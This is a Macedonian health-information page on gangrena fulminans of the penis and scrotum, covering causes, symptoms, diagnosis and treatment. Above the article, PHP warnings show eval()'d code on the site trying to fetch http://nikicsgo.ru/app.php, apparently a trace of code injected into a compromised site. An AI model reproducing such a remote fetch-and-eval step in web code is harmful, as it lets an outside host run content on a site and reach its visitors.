Gangrena fulminans (Опсежно изумирање на ткивото на пенисот и скротумот) | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).

Gangrena fulminans (Опсежно изумирање на ткивото на пенисот и скротумот)

Gangrena fulminans претставува акутна гангрена (труење, изумирање на ткивото) на пенисот и скротумот на која не и претходи balanopostitis (воспаление на глансот и препуциумот на пенисот).








Причини за настанување



Етиологијата и патогенезата не се доволно познати. Се смета дека етиолошка улога има Plaut-Vincet-овиот бацил или можеби станува збор за гангренозен еризипел.



Клиничка слика



Болеста започнува ненадејно, со висока температура и треска, едем (оток) на регионалните лимфни јазли (ингвинални) и појава на оток на скротумот и пенисот. Понекогаш во анамнезата се добива податок за некоја незначителна траума, на пример ексоријација (гребнатинка). Болеста многу брзо го деструира пенисот и скротумот и во повеќето случаи доведува до летален завршеток.



Дијагноза



Се поставува врз основа на анамнезата, клиничката слика, прегледот, со докажување на причинителот во распаднатите ткива.



Терапија



Терапијата се спроведува со високи дози на антибиотици со широк спектар, паралелно со хируршко отстранување на некротичното ткиво (во здраво).



Автор: За Здравје

ЗА ЗДРАВЈЕ NEWSLETTER